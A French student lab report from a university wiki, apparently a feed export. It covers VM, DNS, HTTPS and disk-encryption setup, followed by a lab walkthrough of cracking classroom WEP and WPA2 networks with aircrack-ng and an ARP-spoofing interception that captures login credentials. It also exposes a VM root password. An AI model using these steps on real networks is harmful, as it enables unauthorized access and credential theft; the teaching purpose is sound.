On crée ensuite un &amp;lt;code&amp;gt;newaliases&amp;lt;/code&amp;gt; puis on restarte bind9 avec la commande &amp;lt;code&amp;gt;service bind9 restart&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Attention pour les test il est conseiller d'utilisé deux boite mail différant care celle ci prenne du temps pour se mettre a jours.&lt;br /&gt;
&lt;br /&gt;
====Envoie du SSL Certification Gandi====&lt;br /&gt;
&lt;br /&gt;
Quand on est sure que le mail fonctionne bien avec l'envoie d'un message a destination de 'admin@glopglop.site' on peux demandé a gandi de bous envoyer la clef de cryptage.&lt;br /&gt;
On demande d'envoyé le ssl certification a notre VM, cela peux prendre un certain temps.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:SSL_Certification_Gandi_Mirage.png|1000px|thumb|left|texte descriptif]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans le mail de Gandi on reçoit un code de confirmation ainsi qu'un mot de passe. Une fois confirmer, on peut télécharger les fichiers 'glopglop.site.crt' et 'GandistandardSSLCA2.perm'&lt;br /&gt;
&lt;br /&gt;
Une fois les fichiers télécharger et importer dans la Vm dans le dossier '/root', il faut dire que quand on se connecte sur le site 'glopglop.site' en 'https' il dois utilisé la cled publique 'myserver.key'.&lt;br /&gt;
[[Fichier:Gandi-téléchargement_clefetcertifica_mirage.png|1000px|thumb|left|Fichiers Gandi a téléchargé]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
quand on utilise le ssh on passe par le port '442' dans le fichier &amp;lt;code&amp;gt;/etc/apache2/sites-available/default-ssl.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
On ajoute les lignes suivantes : &lt;br /&gt;
&lt;br /&gt;
 SSLEngine on&lt;br /&gt;
 SSLCertificateFile /root/glopglop.site.crt&lt;br /&gt;
 SSLCertificateKeyFile /root/myserver.key&lt;br /&gt;
 SSLCertificateChainFile /root/GandiStandardSSLCA2.pem &lt;br /&gt;
&lt;br /&gt;
On reboot le service apash2 pour qu'il prenne les modification en compte.&lt;br /&gt;
Le service ne fonctionne pas encore car on a rien qui écoute le port 442. &lt;br /&gt;
 /etc/apache2/sites-available/default-ssl.conf &lt;br /&gt;
 dnssec-signzone -o glopglop.site -k glopglop.site-ksk ../db.glopglop.site glopglop.site-zsk&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
Il ne faut pas oublier d'incrémenter le numéro de version avant de restart le service 'bind9'&lt;br /&gt;
&lt;br /&gt;
On vérifie que tout fonctionne bien avec les commandes : &lt;br /&gt;
 host www.glopglop.site&lt;br /&gt;
 www.glopglop.site is an alias for dns1.glopglop.site.&lt;br /&gt;
 dns1.glopglop.site has address 193.48.57.168&lt;br /&gt;
  &lt;br /&gt;
 host www.glopglop.site ns6.gandi.net&lt;br /&gt;
 Using domain server:&lt;br /&gt;
 Name: ns6.gandi.net&lt;br /&gt;
 Address: 2001:4b98:d:1::40#53&lt;br /&gt;
 Aliases: &lt;br /&gt;
 &lt;br /&gt;
 www.glopglop.site is an alias for dns1.glopglop.site.&lt;br /&gt;
 dns1.glopglop.site has address 193.48.57.168&lt;br /&gt;
&lt;br /&gt;
On peut maintenant vérifier que le site est maintenant bien sécurisé en 'https'&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Glopglop.site_Securisé.png|1000px|thumb|left|GlopGlop.site en Https]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
on a maintenant un site sécurisé en 'https'&lt;br /&gt;
&lt;br /&gt;
====Modification de la page d'accueille Apashe2====&lt;br /&gt;
&lt;br /&gt;
Pour éviter d'avoir la page de base Apash2, on va modifier le fichier 'index.html' pour cela il suffit d'éditer le fichier avec vim avec la commande &amp;lt;code&amp;gt;vim /var/www/html/index.html&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Le site : https://www.w3schools.com/html/html_examples.asp explique comment faire sa propre page web.&lt;br /&gt;
la page pour le site 'glopglop.site' ne sert que d'exemple si on veux une page plus élaborer des template sont directement disponible sur le net avec en prime les fichiers css pour obtenir un site vraiment attractif. mais on cherche juste pour le moment a avoir une page différente de test.&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
Un ordinateur portable et une clef Wifi est fourni par Monsieur Redon. Pour que le clef fonctionne il est nécessite pas nécessairement de la configuration. Il faut aussi installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA&lt;br /&gt;
&lt;br /&gt;
=== Installation de la clef Wifi ===&lt;br /&gt;
Avec la commande &amp;lt;code&amp;gt;lsusb&amp;lt;/code&amp;gt; on peux voir la list des interfaces connecté aux pc. Ci-dessous les résultats obtenu.&lt;br /&gt;
&lt;br /&gt;
 Bus 003 Device 004: ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter&lt;br /&gt;
 Bus 003 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub&lt;br /&gt;
 Bus 003 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
 Bus 004 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub&lt;br /&gt;
 Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
 Bus 001 Device 004: ID 413c:2003 Dell Computer Corp. Keyboard&lt;br /&gt;
 Bus 001 Device 003: ID 046d:c016 Logitech, Inc. Optical Wheel Mouse&lt;br /&gt;
 Bus 001 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub&lt;br /&gt;
 Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
&lt;br /&gt;
La clef ubs Wifi est bien détécter.&lt;br /&gt;
On doit donc installer le pilote pour les clef usb RT5370 avec la commande :&lt;br /&gt;
 apt-get install firmware-ralink&lt;br /&gt;
 apt-get install firmware-misc-nonfree&lt;br /&gt;
&lt;br /&gt;
Une fois les pilotes installer, on récupéère le nom de l'interface wifi avec la commande &amp;lt;code&amp;gt;ip l&amp;lt;/code&amp;gt; et on récupère le résultat ci-dessous : &lt;br /&gt;
 1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00&lt;br /&gt;
 2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:22:4d:7a:f1:c3 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 3: eth1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 5: bridge: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc noqueue state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 6: vmnet1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:50:56:c0:00:01 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 7: vmnet8: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:50:56:c0:00:08 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 8: wlx40a5ef059784: &amp;lt;NO-CARRIER,BROADCAST,MULTICAST,UP&amp;gt; mtu 1500 qdisc mq state DOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 40:a5:ef:05:97:84 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
&lt;br /&gt;
La clef wifi s'apelle donc &amp;lt;code&amp;gt;wlx40a5ef059784&amp;lt;/code&amp;gt; on fait maintenant un &amp;lt;code&amp;gt; ip link set wlx40a5ef059784 up&amp;gt;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avec la comande &amp;lt;code&amp;gt;dmsg&amp;lt;/code&amp;gt; on vérifie que la clef wifi fonctionne bien. &lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il faut de taper la commande :&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
 apt-get install firmware-misc-nonfree&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
 &lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de &amp;lt;code&amp;gt;airmon-ng&amp;lt;/code&amp;gt; qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
 airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
 airmon-ng start wlx40a5ef059784&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On obtien le résultat ci dessous :                                   &lt;br /&gt;
                                                                                                                &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                 &lt;br /&gt;
 38:0E:4D:B0:E9:E0   -1        0        1    0   1  -1   WPA              &amp;lt;length:  0&amp;gt;                          &lt;br /&gt;
 04:DA:D2:9C:50:51  -30       49      834    0   9  54e. WEP  WEP         cracotte02                            &lt;br /&gt;
 04:DA:D2:9C:50:5A  -29       44      841    0   9  54e. WEP  WEP         cracotte11                            &lt;br /&gt;
 04:DA:D2:9C:50:56  -28       53      832    9   9  54e. WEP  WEP         cracotte07                            &lt;br /&gt;
 04:DA:D2:9C:50:57  -29       54      803    0   9  54e. WEP  WEP         cracotte08                            &lt;br /&gt;
 04:DA:D2:9C:50:59  -30       50      833    0   9  54e. WEP  WEP         cracotte10                            &lt;br /&gt;
 04:DA:D2:9C:50:54  -29       48      841    0   9  54e. WEP  WEP         cracotte05                            &lt;br /&gt;
 04:DA:D2:9C:50:50  -29       50      841    0   9  54e. WEP  WEP         cracotte01                            &lt;br /&gt;
 04:DA:D2:9C:50:5B  -29       50      825    0   9  54e. WEP  WEP         cracotte12                            &lt;br /&gt;
 04:DA:D2:9C:50:53  -33       46      843    0   9  54e. WEP  WEP         cracotte04                            &lt;br /&gt;
 04:DA:D2:9C:50:58  -28       50      694    0   9  54e. WEP  WEP         cracotte09                            &lt;br /&gt;
 04:DA:D2:9C:50:55  -30       49      746    0   9  54e. WEP  WEP         cracotte06                            &lt;br /&gt;
 04:DA:D2:9C:50:52  -33       50      764    0   9  54e. WEP  WEP         cracotte03                            &lt;br /&gt;
 00:14:1B:60:8C:28  -30       60        0    0   4  54e. WPA2 CCMP   PSK  kracotte09                            &lt;br /&gt;
 00:14:1B:60:8C:22  -31       55        0    0   4  54e. WPA2 CCMP   PSK  kracotte03                            &lt;br /&gt;
 00:14:1B:60:8C:27  -32       64        0    0   4  54e. WPA2 CCMP   PSK  kracotte08                            &lt;br /&gt;
 00:14:1B:60:8C:24  -34       58        0    0   4  54e. WPA2 CCMP   PSK  kracotte05                            &lt;br /&gt;
 00:14:1B:60:8C:23  -31       63        0    0   4  54e. WPA2 CCMP   PSK  kracotte04&lt;br /&gt;
&lt;br /&gt;
Le réseau que nous voulons craquer est &amp;lt;code&amp;gt;cracotte05 ssid : 04:DA:D2:9C:50:54  chanel : 9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On utilise la commande &amp;lt;code&amp;gt;airodump-ng -w reseau_cracotte05 -c 9 --bssid 04:DA:D2:9C:50:54 wlan0mon&amp;lt;/code&amp;gt;. cela nous crée un &amp;lt;code&amp;gt;reseau_cracotte05-01.cap&amp;lt;/code&amp;gt; On n'as pluq qu'a faire un &amp;lt;code&amp;gt;aircrack-ng reseau_cracotte05-01.cap &amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
 KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   F1(50176) 48(46848) A1(46080) C9(45824) 2A(45056) &lt;br /&gt;
    1    0/  1   DE(50944) F0(46592) 60(45824) 4D(45312) 1E(44544) &lt;br /&gt;
    2    1/  3   D4(47360) 98(46336) B6(45568) A7(45056) EB(45056) &lt;br /&gt;
    3    0/  2   00(47360) 34(46848) 4E(45824) 6F(44800) 35(44544) &lt;br /&gt;
    4    0/  1   00(50688) 09(45824) 50(45568) FD(45056) 5E(44032) &lt;br /&gt;
    5    0/  3   00(46592) BD(45824) 4A(45824) 5A(45056) 87(45056) &lt;br /&gt;
    6    0/  1   00(51456) 09(47104) 3A(45824) F9(45824) 04(45568) &lt;br /&gt;
    7    0/  1   00(51712) C9(47360) 08(46336) 56(45312) E2(44800) &lt;br /&gt;
    8    0/  1   00(54016) 05(45568) C1(45312) D5(44544) B7(44288) &lt;br /&gt;
    9    0/  2   00(47872) 56(46592) 84(45568) 88(45568) F2(45056) &lt;br /&gt;
   10    1/  2   09(48128) 6B(45824) D5(45824) 0C(45568) C2(45568) &lt;br /&gt;
   11    0/  2   99(48128) 76(47616) 99(46080) E6(46080) 06(44800) &lt;br /&gt;
   12    2/  4   FD(44800) DE(44544) B9(44032) 3F(43776) 94(43776) &lt;br /&gt;
&lt;br /&gt;
   KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:09:99:99 ] &lt;br /&gt;
   Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
Et voila nous avons trouver clef du réseau wifi cracotte05&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA2-PSA ===&lt;br /&gt;
&lt;br /&gt;
On va maintenant craquer le réseau Kracotte05 qui est un réseau WPA on sait d'avance que la clef WPA est un nombre sur 8 chiffres.&lt;br /&gt;
&lt;br /&gt;
On va donc faire un &amp;quot;cassage par force brute&amp;quot; avec un fichier texte contenant tout les combination de 00000000 a 99999999.&lt;br /&gt;
&lt;br /&gt;
On commence par installer Crnch avec la commande &amp;lt;code&amp;gt;sudo apt-get install -y crunch&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois installer on génère un fichier dictionnaite.txt avec la commande &amp;lt;code&amp;gt;crunch 8 8 0123456789 &amp;gt;&amp;gt; dictionnaire_wpa.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
On relance la commande &amp;lt;code&amp;gt;airodump-ng -w reseau_kracotte05 -c 5 --bssid 00:14:1B:60:8C:24&amp;lt;/code&amp;gt;&lt;br /&gt;
On a bien sure remplacer le ssid et le chanel par celui du wifi Kracotte05.&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons aircrack-ng avec la commande &amp;lt;code&amp;gt;aircrack-ng reseau_kracotte05-01.cap -w dictionnaire_wpa.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
Read 121032 packets.&lt;br /&gt;
&lt;br /&gt;
   #  BSSID              ESSID                     Encryption&lt;br /&gt;
 &lt;br /&gt;
   1  00:14:1B:60:8C:24  kracotte05                No data - WEP or WPA&lt;br /&gt;
 &lt;br /&gt;
   Choosing first network as target.&lt;br /&gt;
 &lt;br /&gt;
   Opening reseau_kracotte05-01.cap&lt;br /&gt;
   Read 121032 packets.&lt;br /&gt;
 &lt;br /&gt;
   1 potential targets&lt;br /&gt;
   Got no data packets from target network!&lt;br /&gt;
   Quitting aircrack-ng...&lt;br /&gt;
&lt;br /&gt;
On peut voir que cela prend du temps pour récupérer les data nécessaire pour effectuer le crackage 1 data toutes les 15 minutes.&lt;br /&gt;
&lt;br /&gt;
Une fois que on a récupérer les data, on peux effectuer le &amp;quot;cassage par force brute&amp;quot; &lt;br /&gt;
&lt;br /&gt;
  Aircrack-ng 1.5.2 &lt;br /&gt;
 &lt;br /&gt;
      [00:32:18] 10323450/102795810 keys tested (2771.75 k/s) &lt;br /&gt;
 &lt;br /&gt;
      Time left: 9 hours, 16 minutes, 11 seconds                10.04%&lt;br /&gt;
 &lt;br /&gt;
                           KEY FOUND! [ 10244444 ]&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
      Master Key     : D6 B0 55 29 8C A0 B4 C9 13 24 C9 03 8C D5 13 4B &lt;br /&gt;
                       46 A4 C2 DB 79 E7 4C BC AE B5 5A 5D 48 D7 C4 3B &lt;br /&gt;
 &lt;br /&gt;
      Transient Key  : 25 23 28 1B 21 51 4B 87 07 51 A4 8E D1 80 48 C8 &lt;br /&gt;
                       54 F6 87 8B 30 DF C1 D0 E6 1A 74 87 2F 50 EC 1B &lt;br /&gt;
                       9B 24 39 29 40 E3 BD 89 CD AE 3E 81 E9 EC 16 70 &lt;br /&gt;
                       79 F9 24 2E 30 4E 52 24 A9 41 30 52 E1 25 EC 85 &lt;br /&gt;
 &lt;br /&gt;
      EAPOL HMAC     : 7F AC 76 7D B5 33 0C 24 20 C3 BA A2 4B DF 2F CD&lt;br /&gt;
&lt;br /&gt;
On a bien trouver la clé du wifi !&lt;br /&gt;
&lt;br /&gt;
On voit que cela peut prendre beaucoup de temps pour trouver la clé, d'out l'interner de couper le dictionnaire en plusieurs et lancer le traitement sur plusieurs pc des camarades de classe. &lt;br /&gt;
&lt;br /&gt;
Cela permet de diviser le temps de traitement par le nombre de machine utilisé.&lt;br /&gt;
&lt;br /&gt;
===Exploitation de failles du système===&lt;br /&gt;
&lt;br /&gt;
===Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP===&lt;br /&gt;
Maintenant on tesnt une attaque par &amp;quot;homme au milieu&amp;quot; pour commancé, on va installer le paquetage &amp;lt;code&amp;gt;dsniff&amp;lt;/code&amp;gt; pour cela on utilise la commande : &amp;lt;code&amp;gt;apt-get install dsniff&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On regarde dans un premier temps si le pc peut se comporter comme un routeur avec la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/ip_forward&amp;lt;/code&amp;gt; normalement il nous notifie '0' se qui prouve que le pc ne se comporte pas comme un routeur. On utilise la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/ip_forward&amp;lt;/code&amp;gt; pour faire passer la variable a 1. maintenant le PC peut se comporter comme un routeur.&lt;br /&gt;
&lt;br /&gt;
On fait la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/conf/all/rp_filter&amp;lt;/code&amp;gt; la variable recu doit être a '0' ce qui permet aux pc de renvoyer les requètes sur l'interface qui les a recu.&lt;br /&gt;
&lt;br /&gt;
Ensuite on fait un &amp;lt;code&amp;gt;ip r&amp;lt;/code&amp;gt; pour récupérer l'adresse ip du routeur.&lt;br /&gt;
[[Fichier:Ip_r_mirage.png|1000px|thumb|left|capture de la commande ip r]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On fait la commande &amp;lt;code&amp;gt;arpspoof -i bridge -t zabeth07 172.26.145.254&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On lance Wireshark en root en utilisant la commande &amp;lt;code&amp;gt;su&amp;lt;/code&amp;gt; si celui ci n'est pas installer on fait préalablement &amp;lt;code&amp;gt;apt-get install wireshark&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois Wireshark lancé, on filtre tout les paquets en provenance de nottre cible la zabeth07.&lt;br /&gt;
&lt;br /&gt;
Il faut fauire attention de bien désativer les proxi dans firefow sinon cela ne fonctionne pas.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Wireshark_mirage.png|1000px|thumb|left|capture de Wiresharkf]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut voir que on a bien recupérer les mdp lors de la connexion aux site 'applications.polytech-lille.net'.&lt;br /&gt;
 Non d'utilisateur : Oui le pas de calais&lt;br /&gt;
 Mdp : le mdp&lt;br /&gt;
&lt;br /&gt;
=== Intrusion sur un serveur d’application Web===&lt;br /&gt;
&lt;br /&gt;
==Réalisations==&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de données===&lt;br /&gt;
&lt;br /&gt;
===Chiffrement de données===&lt;br /&gt;
&lt;br /&gt;
Parfois il est necessaire de chiffrer les données importante,d'avoir des clef USB, ou des fichier sécuriser. Pour sécuriser la clef USB, on va utilisé 'cryptsetup'&lt;br /&gt;
pour commancer on installe les paquetages 'lvm2' et 'cryptsetup'.&lt;br /&gt;
 apt-get install cryptsetup&lt;br /&gt;
 apt-get install lvm2 &lt;br /&gt;
&lt;br /&gt;
Le [https://doc.ubuntu-fr.org/cryptsetup site] on peut trouver la liste des commandes necessaire pour crypter le clef USB.&lt;br /&gt;
&lt;br /&gt;
Premièrement on va formaté la clef usb pour avoir un disque propre avec la commande &amp;lt;code&amp;gt;mkfs.vfat -n 'Alex.G' -I /dev/sdb1&amp;lt;/code&amp;gt; on obtien le nom de la clef USB avec la commande &amp;lt;code&amp;gt;df -h&amp;lt;/code&amp;gt;&lt;br /&gt;
On a maintenant une clef USB clean qui a comme nom Alex.G et un format FAT32.&lt;br /&gt;
&lt;br /&gt;
On peut lancer le cryptage de la clef USB avec la commande &amp;lt;code&amp;gt;cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/sdb&amp;lt;/code&amp;gt; Pour savoir ou les la clef USB on utilise la commande &amp;lt;code&amp;gt;lsblk&amp;lt;/code&amp;gt;&lt;br /&gt;
On choisi un mdp pour le clef USB, puis on envoie le fichier etc sur le clef pour vérifier si il est bien encrypter. Une fois la clef crypter avec un fichier dessu, on va sur un autre pc et on, vérifie si le fichier est bien crypter.&lt;br /&gt;
La liste des commande utilisé est listé ci-dessous : &lt;br /&gt;
 mount /dev/mapper/Alex.G /mnt&lt;br /&gt;
 cp -r /etc /mnt&lt;br /&gt;
 umount /mnt&lt;br /&gt;
 cryptsetup luksClose Alex.G&lt;br /&gt;
&lt;br /&gt;
On peut voir que le clef USB crypter fonctionne bien.&lt;br /&gt;
[[Fichier:ClefUSBLock_2020-11-13_11-48-55.png|1000px|thumb|left|Cryptage de la clef USB]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Inspection ARP par un élément réseau===&lt;br /&gt;
&lt;br /&gt;
===Sécurisation WiFi par WPA2-EAP===&lt;/div&gt;</summary>
		<author><name>Aglaine</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G5&amp;diff=54023</id>
		<title>TP sysres IMA2a5 2020/2021 G5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G5&amp;diff=54023"/>
				<updated>2020-11-27T19:34:47Z</updated>
		
		<summary type="html">&lt;p&gt;Aglaine : /* Introduction */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système vous aurez à installer une machine virtuelle Xen et à y configurer des services. Enfin la mise en place d’un réseau WiFi sécurisé et d’un site web sécurisé vous permettent de mettre en pratiques vos connaissances en la matière.&lt;br /&gt;
&lt;br /&gt;
=== Tableau Récapitulatif ===&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Vlan7&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|193.48.57.168/26&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|2001:660:4401:60a2:216:3eff:fe95:d093/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de de la VM &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|mirage&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth06&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet version HTTP&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|http://www.glopglop.site/&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet version HTTPS&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|https://www.glopglop.site/&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
=== Architecture réseau ===&lt;br /&gt;
L'architecture du réseau est la suivante : &lt;br /&gt;
[[Fichier:Architecture2-MA2a5-2020_2021.JPG|1000px|thumb|left|Architecture du réseau]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Le problème est que si on regarde le réseau n'est pas vraiment redondant : &lt;br /&gt;
&lt;br /&gt;
- Si on a une coupure de courant tout le réseau s'effondrent, dans l'idéale, il faudrait des onduleurs et un réseau électrique séparé pour la Baie1 et la Baie2/3&lt;br /&gt;
&lt;br /&gt;
- Le réseau ADSL n'est pas fonctionnelle donc si on perd le réseau Polytech on n'as plus accès aux machines.&lt;br /&gt;
&lt;br /&gt;
- Toutes les VM et les sites WEB sont sur la baie3 qui héberge le serveur de virtualisation Capbreton, si on perd la baie3 tout le système tombe.&lt;br /&gt;
&lt;br /&gt;
- Pour finir dans l'idéale les deux bais devrais être dans des bâtiments séparer en cas d'incendie, on risque de perdre les deux bais.&lt;br /&gt;
&lt;br /&gt;
== Installation des systèmes d’exploitation == &lt;br /&gt;
&lt;br /&gt;
Pour installer une Machine Virtuelle, il faut d'abord se connecter sur le disque de virtualisation.&lt;br /&gt;
Pour cela, il faut utiliser la commande : &lt;br /&gt;
 ssh capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
=== Installation dans la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Une fois connecter, il faut lancer la création de la Machine virtuelle avec la commande :&lt;br /&gt;
  xen-create-image --hostname=mirage --ip 193.48.57.168 --netmask=255.255.255.0 --gateway=100.64.0.5 --dist=ascii --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
L'installation prend un certain temps pour regarder si l'installation se déroule bien, on peut ouvrir un second terminale connecté en SSH a &amp;quot;capbreton&amp;quot; puis on utilise la commande : &lt;br /&gt;
 tail -f /var/log/xen-tools/mirage.0.log&lt;br /&gt;
&lt;br /&gt;
A la fin de l'installation, on obtient le mot de passe root et des informations importantes :&lt;br /&gt;
      Installation Summary&lt;br /&gt;
     ---------------------&lt;br /&gt;
     Hostname        :  mirage&lt;br /&gt;
     Distribution    :  ascii&lt;br /&gt;
     MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
     IP Address(es)  :  dynamic&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
     Root Password   :  DgtUlOmnBFERdfarGBsopGR&lt;br /&gt;
&lt;br /&gt;
Une fois la VM créer, nous pouvons la lancer avec la commande :&lt;br /&gt;
 xl create /etc/xen/mirage.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que le VM est bien démarrer avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
Pour fonctionner l'état de la VM doit être r ou -b&lt;br /&gt;
&lt;br /&gt;
[[Fichier:LancementVm.PNG|1000px|thumb|left|Liste des VM en fonctionnement]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On accède pour la premier fois a nottre Vm avec la commande :&lt;br /&gt;
 xl console mirage&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). &lt;br /&gt;
